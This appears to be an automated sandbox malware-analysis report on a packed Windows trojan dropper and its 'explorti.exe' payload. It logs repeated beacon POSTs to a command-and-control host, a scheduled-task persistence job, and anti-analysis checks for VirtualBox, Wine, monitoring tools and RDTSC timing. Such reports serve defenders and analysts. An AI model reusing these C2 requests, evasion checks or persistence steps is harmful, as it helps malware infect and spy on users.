Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: Joe Sandbox View IP Address: 185.215.113.19 185.215.113.19
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 5_2_0069BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 5_2_0069BD60
Source: unknown HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php

System Summary

Source: 11NdzR12PS.exe Static PE information: section name:
Source: 11NdzR12PS.exe Static PE information: section name: .idata
Source: 11NdzR12PS.exe Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Desktop\11NdzR12PS.exe File created: C:\Windows\Tasks\explorti.job
Source: 11NdzR12PS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 11NdzR12PS.exe Static PE information: Section: ZLIB complexity 0.9997064976092896
Source: 11NdzR12PS.exe Static PE information: Section: wokugkrf ZLIB complexity 0.9944071718563766
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.9997064976092896
Source: explorti.exe.0.dr Static PE information: Section: wokugkrf ZLIB complexity 0.9944071718563766
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\11NdzR12PS.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7
Source: C:\Users\user\Desktop\11NdzR12PS.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\11NdzR12PS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 11NdzR12PS.exe Virustotal: Detection: 53%
Source: 11NdzR12PS.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\11NdzR12PS.exe File read: C:\Users\user\Desktop\11NdzR12PS.exe
Source: unknown Process created: C:\Users\user\Desktop\11NdzR12PS.exe "C:\Users\user\Desktop\11NdzR12PS.exe"
Source: C:\Users\user\Desktop\11NdzR12PS.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\11NdzR12PS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: 11NdzR12PS.exe Static file information: File size 1921536 > 1048576
Source: 11NdzR12PS.exe Static PE information: Raw size of wokugkrf is bigger than: 0x100000 < 0x1a3800

Data Obfuscation

Source: C:\Users\user\Desktop\11NdzR12PS.exe Unpacked PE file: 0.2.11NdzR12PS.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 1.2.explorti.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 5.2.explorti.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1db077 should be: 0x1e273f
Source: 11NdzR12PS.exe Static PE information: real checksum: 0x1db077 should be: 0x1e273f
Source: 11NdzR12PS.exe Static PE information: section name:
Source: 11NdzR12PS.exe Static PE information: section name: .idata
Source: 11NdzR12PS.exe Static PE information: section name:
Source: 11NdzR12PS.exe Static PE information: section name: wokugkrf
Source: 11NdzR12PS.exe Static PE information: section name: csqdmnjl
Source: 11NdzR12PS.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: wokugkrf
Source: explorti.exe.0.dr Static PE information: section name: csqdmnjl
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 5_2_006AD84C push ecx; ret 5_2_006AD85F
Source: 11NdzR12PS.exe Static PE information: section name: entropy: 7.980756696745502
Source: 11NdzR12PS.exe Static PE information: section name: wokugkrf entropy: 7.954605137442367
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.980756696745502
Source: explorti.exe.0.dr Static PE information: section name: wokugkrf entropy: 7.954605137442367
Source: C:\Users\user\Desktop\11NdzR12PS.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Boot Survival

Source: C:\Users\user\Desktop\11NdzR12PS.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\11NdzR12PS.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\11NdzR12PS.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\11NdzR12PS.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\11NdzR12PS.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\11NdzR12PS.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\11NdzR12PS.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F450C1 second address: F450C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F450C5 second address: F450CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F4520C second address: F45213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F45213 second address: F45227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB0Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F45374 second address: F45378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F45378 second address: F45395 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF34080AB13h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F45395 second address: F4539B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F4539B second address: F453B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F45BCC second address: F45BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810307h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F45BEB second address: F45BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F4CFCE second address: F4CFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F4D7CA second address: F4D7D4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F4E726 second address: F4E72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F4E72E second address: F4E747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F4E747 second address: F4E74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F4E74B second address: F4E787 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF34080AB11h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jp 00007FF34080AB06h 0x00000020 popad 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jnp 00007FF34080AB08h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F4E787 second address: F4E791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F5313C second address: F53162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB10h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FF34080AB06h 0x00000015 jnc 00007FF34080AB06h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F53162 second address: F53192 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF3408102FAh 0x00000015 jmp 00007FF340810306h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F53192 second address: F531B8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF34080AB1Bh 0x00000008 jmp 00007FF34080AB15h 0x0000000d push eax 0x0000000e jg 00007FF34080AB06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F52619 second address: F5261F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F52760 second address: F527AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007FF34080AB0Dh 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 je 00007FF34080AB06h 0x0000001c jng 00007FF34080AB06h 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007FF34080AB13h 0x00000029 jng 00007FF34080AB06h 0x0000002f push edi 0x00000030 pop edi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F52CB8 second address: F52CBE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F52CBE second address: F52CDC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FF34080AB06h 0x00000009 pop edi 0x0000000a push esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FF34080AB08h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F52CDC second address: F52CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F52CE2 second address: F52CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F52CE6 second address: F52D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810304h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F52D00 second address: F52D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F52E68 second address: F52E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FF3408102F6h 0x00000011 pop ebx 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F53987 second address: F5398F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F53EB9 second address: F53EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F5467D second address: F5468A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F54829 second address: F54833 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF3408102FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F549D2 second address: F549D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
